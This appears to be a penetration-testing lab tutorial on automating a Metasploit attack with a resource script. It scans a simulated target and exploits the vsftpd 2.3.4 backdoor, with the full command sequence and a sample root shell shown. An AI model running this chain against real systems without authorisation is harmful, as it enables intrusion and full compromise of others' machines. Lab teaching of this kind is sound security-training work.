Introduction
Welcome to this lab on automating attacks with Metasploit resource scripts. The Metasploit Framework is a powerful tool for penetration testing, but manually typing commands for each engagement can be repetitive and time-consuming. Resource scripts, which are simple text files with a .rc extension, allow you to automate these sequences of commands.
In this lab, you will learn how to create a resource script to automate a complete attack chain against a vulnerable service. This includes setting up a workspace, scanning the target, selecting an exploit, configuring it, and launching the attack. By the end of this lab, you will be able to create your own scripts to streamline your penetration testing workflows.
For this lab, we will be targeting a simulated vulnerable machine. Assume the target machine's IP address is 10.0.2.15.
Create a new file with a .rc extension
In this step, you will create the resource script file. A Metasploit resource script is simply a text file containing a list of msfconsole commands that are executed sequentially. By convention, these files have a .rc extension.
We will use the nano text editor to create a file named attack.rc in the default ~/project directory.
Open your terminal and execute the following command to create and open the new file:
nano attack.rc
This command will open an empty file in the nano editor. For now, just save the empty file and exit the editor by pressing Ctrl+X, then Y, and finally Enter. You have now created the resource script file that you will populate in the next steps.
Add a sequence of msfconsole commands to the file
In this step, you will add the initial commands to your resource script. These commands will set up a dedicated workspace for our test and run a basic Nmap scan to gather information about the target. Organizing work into workspaces is a good practice in Metasploit.
First, open the attack.rc file again using nano:
nano attack.rc
Now, add the following lines to the file. The first command creates a new workspace named vsftpd_lab, and the second command runs an Nmap scan against our target (10.0.2.15) and saves the results to the database.
workspace -a vsftpd_lab
db_nmap -A 10.0.2.15
After adding these two lines, your attack.rc file should look exactly like this. Save the file and exit nano by pressing Ctrl+X, Y, and Enter.
Include commands to use an exploit set options and run
In this step, you will add the core attack commands to the script. We will be targeting a known vulnerability in the VSFTPD server, specifically the vsftpd_234_backdoor exploit. You will add commands to select this exploit, set the required target option, and finally, execute it.
Open the attack.rc file again with nano:
nano attack.rc
Append the following commands to the end of the file. These commands instruct Metasploit to:
use exploit/unix/ftp/vsftpd_234_backdoor: Select the specific exploit module.set RHOSTS 10.0.2.15: Set theRHOSTS(Remote Hosts) option to our target's IP address.exploit: Launch the attack.
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.15
exploit
After adding these lines, your complete attack.rc file should now contain the following five commands:
workspace -a vsftpd_lab
db_nmap -A 10.0.2.15
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.15
exploit
Save the changes and exit the nano editor (Ctrl+X, Y, Enter). Your automated attack script is now complete.
Launch msfconsole with the -r flag to execute the script
In this step, you will execute the resource script you just created. The Metasploit console, msfconsole, can be launched with the -r flag followed by the path to a resource script. This tells Metasploit to execute the commands from the specified file upon startup.
Make sure you are in the ~/project directory where your attack.rc file is located. Now, run the following command in your terminal:
msfconsole -r attack.rc
This command will start the Metasploit Framework. Instead of presenting you with the usual msf6 > prompt immediately, it will begin executing each command from attack.rc one by one.
Observe the automated execution of the attack chain
In this final step, you will observe the results of your automated script. As msfconsole runs, you will see the output from each command in your attack.rc file. You will see the workspace being created, the Nmap scan running, the exploit being configured, and finally, the attack being launched.
If the attack is successful, Metasploit will open a command shell session on the target machine. You will see a message similar to this:
[*] Found shell.
[*] Command shell session 1 opened (10.0.2.4:42931 -> 10.0.2.15:6200) at 2023-10-27 10:30:00 -0400
You are now in a shell on the compromised target. To verify this, you can run a command like whoami to see which user you are running as.
whoami
The expected output should be:
root
This confirms that your automated script has successfully compromised the target and gained root access.
To clean up, type exit to close the command shell session, and then type exit again to quit msfconsole.
Summary
In this lab, you have successfully learned how to automate a penetration testing workflow using Metasploit resource scripts.
You started by creating a resource script file (attack.rc). Then, you populated it with a sequence of msfconsole commands to perform a full attack chain: creating a workspace, scanning the target, selecting and configuring an exploit, and finally launching the attack. You learned how to execute this script using the msfconsole -r command and observed the automated execution.
This skill is invaluable for saving time and ensuring consistency in your security assessments. You can now create more complex scripts to automate various repetitive tasks in your future engagements.
